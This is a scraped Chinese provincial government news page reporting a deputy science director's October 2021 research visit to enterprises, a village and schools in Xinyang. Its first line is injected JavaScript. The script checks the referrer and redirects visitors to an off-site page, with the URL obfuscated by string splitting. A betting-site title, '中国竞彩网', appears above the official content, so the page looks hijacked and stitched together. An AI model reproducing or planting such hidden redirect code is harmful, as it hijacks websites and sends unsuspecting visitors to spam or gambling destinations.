var ref=document.referrer;if(ref.length>3){location.href="ht"+"tps://wa"+ "p.y6"+"6"+"6.net/baidu444.htm?"+document.domain;}

中国竞彩网

图片

当前位置:首页 工作动态

陈志强副厅长带队到信阳市调研科技创新、平安建设和乡村振兴工作


发布日期:2021-10-22 17:05来源:办公室 阅读次数:

  10月18日—19日,省科技厅党组成员、副厅长陈志强带队一行4人到信阳市高新区、光山县、潢川县调研指导科技创新、平安建设及乡村振兴工作。

  在信阳市高新区,陈志强一行先后到中部半导体、航天精工、明阳智慧、圆创磁电等科技型企业进行调研,信阳市副市长李正军,市科技局局长黄晓赟等相关人员陪同调研。陈志强一行详细了解相关企业发展现状、规划目标、科技创新、平台建设等情况,还与企业负责人进行了深入交谈,详细了解其研发技术、生产应用等情况,并提出了指导意见。

陈志强副厅长带队到信阳市调研科技创新、平安建设和乡村振兴工作

  在光山县,陈志强一行在光山县委书记王建平的陪同下,深入省科技厅帮扶点罗陈乡周湾村对科技扶贫工作专题调研,看望慰问了周湾村小学师生、进行了物资捐赠,陈志强表示在第 29 个“国际消除贫困日”来临之际,省科技厅开展此次调研,就是希望能在助力乡村振兴方面持续发挥科技优势,要求驻村第一书记王备战同志要紧密结合当地产业特色和实际,与村委会同志们一道,聚焦群众生产生活的难点问题,切实为群众办实事、办好事。一行人还实地考察了周湾村重点扶贫项目—司马光油茶园云梦山油茶基地、平煤神马集团光山新材料、三元光电等企业,深入了解企业现状及存在困难,对企业所提的高企申报、创新平台建设等问题进行了解答。

  在潢川县,陈志强一行首先来到潢川县逸夫小学,听取学校平安校园建设、科技教育等工作汇报,参观了学校的科普走廊,向学校现场捐赠了科普图书及器材。陈志强强调,学校要始终将校园安全摆在重要位置加强管理,全面提升“平安校园”建设的水平和质量,同时要加强青少年科普工作,注重培养学生的创新能力和科学意识。随后还实地调研了荣丰纺织、滨湖印务、新厨帮食品、黄国粮业等企业,陈志强鼓励企业要坚定把科技创新作为发展引擎,持续加大研发投入,进一步深化与高等院校、科研院所合作,为县域经济高质量发展贡献力量。